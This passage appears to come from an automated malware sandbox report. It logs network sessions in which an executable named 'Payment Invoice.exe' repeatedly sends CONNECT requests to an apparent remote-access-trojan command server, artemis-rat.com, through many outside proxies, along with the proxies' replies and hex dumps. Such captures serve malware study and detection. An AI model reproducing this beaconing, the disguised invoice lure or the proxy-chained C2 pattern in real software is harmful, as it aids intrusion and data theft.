                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1056192.168.2.45321343.153.81.604437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.096853971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1057192.168.2.45321543.153.81.604437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.097593069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1058192.168.2.453124198.199.86.1131287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.097965956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.152568102 CET28INHTTP/1.1 400 Bad Request


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1059192.168.2.45321843.153.81.604437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.098752022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1060192.168.2.452984222.138.76.690027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.108802080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.619467020 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1061192.168.2.45253388.84.62.541537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.111908913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1062192.168.2.453054121.66.198.7641457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.118961096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1063192.168.2.453050192.162.232.1510807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.120208979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1064192.168.2.45257493.157.248.108887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.131797075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1065192.168.2.45316698.178.72.21109197076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.156899929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1066192.168.2.45306813.38.176.10431287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.158760071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.455894947 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1067192.168.2.453084121.182.138.71807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.162628889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1068192.168.2.4531003.73.120.10431287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.182987928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.172584057 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1069192.168.2.453145196.20.125.12980837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.187469959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1070192.168.2.45312294.130.94.45807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.188338041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1071192.168.2.453183104.16.105.182807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.199949026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.355509043 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1072192.168.2.45306545.11.95.16560107076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.215889931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1073192.168.2.451383138.68.24.185593077076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.220206022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.214653969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.214638948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.214750051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.323568106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1074192.168.2.453139176.98.81.8580807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.221410036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.980015993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1075192.168.2.453099193.136.97.17807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.222126961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.695699930 CET806INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Server: Apache/2.4.56 (Debian)
                                                                Content-Length: 614
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1076192.168.2.453109120.26.68.107807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.222333908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.569308043 CET442INHTTP/1.1 405 Method Not Allowed
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Server: Apache
                                                                Allow: OPTIONS,GET,HEAD,POST
                                                                Vary: Accept-Encoding
                                                                Content-Length: 235
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 65 20 55 52 4c 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for the URL /index.html.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1077192.168.2.453203104.20.75.31807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.288240910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.442682981 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1078192.168.2.453179177.67.136.24141537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.289169073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1079192.168.2.4531855.161.103.113807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.293375969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1080192.168.2.453059103.163.51.254807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.293375969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1081192.168.2.45309420.219.183.18831297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.293896914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.366580963 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1082192.168.2.453222162.159.242.104807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.294248104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.455543995 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1083192.168.2.452800192.111.139.16541457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.296668053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1084192.168.2.45306790.188.250.16807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.296668053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1085192.168.2.453270172.67.200.220807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.297139883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.452023029 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
